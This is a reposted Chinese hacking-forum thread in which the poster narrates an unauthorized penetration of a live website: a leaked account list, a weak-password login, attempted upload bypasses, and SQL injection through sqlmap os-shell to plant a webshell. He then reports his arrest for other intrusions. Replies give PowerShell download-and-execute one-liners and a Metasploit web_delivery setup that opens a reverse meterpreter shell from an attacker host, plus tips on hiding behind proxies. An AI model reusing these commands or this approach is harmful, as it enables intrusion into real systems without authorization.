一次实战(未完)
2019-12-27 17:02:52 Author: forum.90sec.com(查看原文) 阅读量:317 收藏

#1

拿到目标站点后对其进行简单扫描。

扫描后发现一个URL有明显的显示异常,滞停了一下
0001
用Burp访问SysUser.aspx后发现Response返回是系统账户?
一处未授权吗?

001

往下翻后发现账户信息泄露

Inked2_LI

配合123456弱口令成功的杀进后台,由于文章是后续补的没有后台的截图,在后台上传图片处把dc_=1512512256加上一个数字或者去掉一个数字后发现路径

%E8%B7%AF%E5%BE%84

然后接着突破上传,什么方法都试过还是不行。

%E4%B8%8A%E4%BC%A01

%E4%B8%8A%E4%BC%A02

最后按照不符合windows文件规则方法试了一下。
参考:https://www.freebuf.com/column/196404.html
在文件后缀加上个“.”上传后提示未能隐射路径,这里希望大佬们指教一下这是什么情况。

%E6%97%A0%E6%B3%95%E9%9A%90%E5%B0%84%E6%96%87%E4%BB%B6

无解,接下来回到后台继续找突破,找了很久在“查询”处发现一处post注入,既然还是最高权限。

3

精神来了,配合之前得到的路径用sqlmap执行os-shell 命令echo一句话,结果提示如下

%E5%9B%9E%E5%88%B0%E5%86%99%E6%96%87%E4%BB%B6

发现是<未闭合的原因,本地测试命令没问题后继续echo,发现可能是路径不对的原因还是写不进去

%E5%86%99%E5%85%A5%E4%B8%80%E5%8F%A5%E8%AF%9D

%E5%86%99%E5%85%A5%E5%A4%B1%E8%B4%A5

到此结束,放弃了。

总结一下:

放弃的原因:原因是站点比较铭感,未授权,不然以shell的最高权限应该还是能拿到的webshell的 。

后台post注入:后台post注入利用比较奇葩,有时效性的可能是cookies的原因,等待一段时间之后就不行了,又要重新抓包。

最终的放弃原因:
九月2-3号渗透的,3号下午4点左右我被地方派出所联合当地网警抓了,被抓的原因并不是这个站,而是其他几个当地的平台,被抓后14号出来,行政拘留十天。文章也是我出来以后发布的,期间时间太长了很多忘记了。

在这里奉劝大家,不要未经授权渗透,特别是大陆的实在是手痒或者能力强可以玩玩国外的,被抓也是自己大意,内网漫游既然膨胀不上代理做跳板。

#2

还算是小事,未经授权的站点还是别碰了,搞点研究挺好的

#3

嗯,现在都不敢碰

#4

既然能执行命令,可以直接powershell弹msf,路径问题就是SQLMAP对中文路径会乱码

#5

明白了,谢谢大佬。

#6

可是怎么上传msf生成的powershell呢?

#7

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.217.162/7788.ps1‘);xx.ps1"

#8

msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set target 2
target => 2
msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/script/web_delivery) > set LPORT 4455
LPORT => 4455
msf5 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4455
[*] Using URL: http://0.0.0.0:8080/kzwrDk2Sw56Et
[*] Local IP: http://1.1.1.1:8080/kzwrDk2Sw56Et
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $S=new-object net.webclient;$S.proxy=[Net.WebRequest]::GetSystemWebProxy();$S.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $S.downloadstring('http://1.1.1.1:8080/kzwrDk2Sw56Et');

生成后,直接执行:

powershell.exe -nop -w hidden -c $S=new-object net.webclient;$S.proxy=[Net.WebRequest]::GetSystemWebProxy();$S.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $S.downloadstring('http://1.1.1.1:8080/kzwrDk2Sw56Et');

#9

感谢

我现在遇到这种sa的都是直接cs上线,写webshell太麻烦了

#11

以后挂上SS 虚拟机定期还原 硬盘锁
像这种能执行命令的都可以直接上马了
像windows的我一般都尝试文件名+空格

#12

你是不知道当今的图像还原技术有多么的成熟

#13

十天。。。 翻你电脑硬盘了吗啊??

#14

......秀啊 做好代理

:crazy_face:里面还有一处未打码的敏感信息喔,哈哈哈哈,手机号码可以看到


文章来源: https://forum.90sec.com/t/topic/418/15
如有侵权请联系:admin#unsafe.sh